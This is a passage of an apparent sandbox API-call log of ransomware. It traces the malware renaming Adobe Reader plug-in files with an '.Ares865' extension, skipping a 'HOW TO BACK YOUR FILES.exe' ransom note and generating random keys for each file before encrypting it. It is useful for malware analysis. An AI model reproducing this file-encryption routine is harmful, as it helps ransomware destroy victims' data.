(x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ptb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ptb.ares865"), dwFlags=0x1) returned 1 [0173.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.247] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0173.247] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.248] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.248] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.251] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.252] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.SUO" | out: lpString1="Mcimpp.SUO") returned="Mcimpp.SUO" [0173.252] lstrlenW (lpString="Mcimpp.SUO") returned 10 [0173.252] lstrlenW (lpString="Ares865") returned 7 [0173.252] lstrcmpiW (lpString1="mpp.SUO", lpString2="Ares865") returned 1 [0173.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO.Ares865") returned 90 [0173.253] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo.ares865"), dwFlags=0x1) returned 1 [0173.254] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.254] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7680) returned 1 [0173.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.255] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.259] lstrcpyW (in: lpString1=0x2cce490, lpString2="MCIMPP.SVE" | out: lpString1="MCIMPP.SVE") returned="MCIMPP.SVE" [0173.259] lstrlenW (lpString="MCIMPP.SVE") returned 10 [0173.259] lstrlenW (lpString="Ares865") returned 7 [0173.259] lstrcmpiW (lpString1="MPP.SVE", lpString2="Ares865") returned 1 [0173.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE.Ares865") returned 90 [0173.260] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve.ares865"), dwFlags=0x1) returned 1 [0173.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7680) returned 1 [0173.262] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.266] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.268] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.CAT.Ares865" | out: lpString1="QuickTime.CAT.Ares865") returned="QuickTime.CAT.Ares865" [0173.268] lstrlenW (lpString="QuickTime.CAT.Ares865") returned 21 [0173.268] lstrlenW (lpString="Ares865") returned 7 [0173.268] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0173.268] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QuickTime.CHS", cAlternateFileName="QUICKT~1.CHS")) returned 1 [0173.268] lstrcmpiW (lpString1="QuickTime.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.268] lstrcmpiW (lpString1="QuickTime.CHS", lpString2="aoldtz.exe") returned 1 [0173.268] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.CHS" | out: lpString1="QuickTime.CHS") returned="QuickTime.CHS" [0173.268] lstrlenW (lpString="QuickTime.CHS") returned 13 [0173.268] lstrlenW (lpString="Ares865") returned 7 [0173.268] lstrcmpiW (lpString1="ime.CHS", lpString2="Ares865") returned 1 [0173.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHS.Ares865") returned 93 [0173.269] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.chs"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.chs.ares865"), dwFlags=0x1) returned 1 [0173.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.271] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.271] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.271] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.274] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.275] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.275] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.275] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.CHT" | out: lpString1="QuickTime.CHT") returned="QuickTime.CHT" [0173.275] lstrlenW (lpString="QuickTime.CHT") returned 13 [0173.275] lstrlenW (lpString="Ares865") returned 7 [0173.275] lstrcmpiW (lpString1="ime.CHT", lpString2="Ares865") returned 1 [0173.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHT.Ares865") returned 93 [0173.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cht"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cht.ares865"), dwFlags=0x1) returned 1 [0173.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.278] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.279] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.279] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.283] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.DAN" | out: lpString1="QuickTime.DAN") returned="QuickTime.DAN" [0173.283] lstrlenW (lpString="QuickTime.DAN") returned 13 [0173.283] lstrlenW (lpString="Ares865") returned 7 [0173.283] lstrcmpiW (lpString1="ime.DAN", lpString2="Ares865") returned 1 [0173.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DAN.Ares865") returned 93 [0173.283] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.dan.ares865"), dwFlags=0x1) returned 1 [0173.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.285] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.290] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.DEU" | out: lpString1="QuickTime.DEU") returned="QuickTime.DEU" [0173.290] lstrlenW (lpString="QuickTime.DEU") returned 13 [0173.290] lstrlenW (lpString="Ares865") returned 7 [0173.290] lstrcmpiW (lpString1="ime.DEU", lpString2="Ares865") returned 1 [0173.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DEU.Ares865") returned 93 [0173.290] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.deu.ares865"), dwFlags=0x1) returned 1 [0173.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.292] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.293] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.293] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.296] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.297] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.ESP" | out: lpString1="QuickTime.ESP") returned="QuickTime.ESP" [0173.297] lstrlenW (lpString="QuickTime.ESP") returned 13 [0173.297] lstrlenW (lpString="Ares865") returned 7 [0173.297] lstrcmpiW (lpString1="ime.ESP", lpString2="Ares865") returned 1 [0173.297] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ESP.Ares865") returned 93 [0173.297] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.esp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.esp.ares865"), dwFlags=0x1) returned 1 [0173.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.299] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.300] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.303] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.304] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.EUQ" | out: lpString1="QuickTime.EUQ") returned="QuickTime.EUQ" [0173.304] lstrlenW (lpString="QuickTime.EUQ") returned 13 [0173.304] lstrlenW (lpString="Ares865") returned 7 [0173.304] lstrcmpiW (lpString1="ime.EUQ", lpString2="Ares865") returned 1 [0173.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.EUQ.Ares865") returned 93 [0173.304] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.euq"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.euq.ares865"), dwFlags=0x1) returned 1 [0173.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.307] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.309] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.310] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.310] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.311] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.FRA" | out: lpString1="QuickTime.FRA") returned="QuickTime.FRA" [0173.311] lstrlenW (lpString="QuickTime.FRA") returned 13 [0173.311] lstrlenW (lpString="Ares865") returned 7 [0173.311] lstrcmpiW (lpString1="ime.FRA", lpString2="Ares865") returned 1 [0173.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.FRA.Ares865") returned 93 [0173.311] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.fra"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.fra.ares865"), dwFlags=0x1) returned 1 [0173.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.313] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.316] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.317] lstrcpyW (in: lpString1=0x2cce490, lpString2="QuickTime.ITA" | out: lpString1="QuickTime.ITA") returned="QuickTime.ITA" [0173.317] lstrlenW (lpString="QuickTime.ITA") returned 13 [0173.318] lstrlenW (lpString="Ares865") returned 7 [0173.318] lstrcmpiW (lpString1="ime.ITA", lpString2="Ares865") returned 1 [0173.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ITA.Ares865") returned 93 [0173.318] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ita"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ita.ares865"), dwFlags=0x1) returned 1 [0173.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.320] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.323] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, 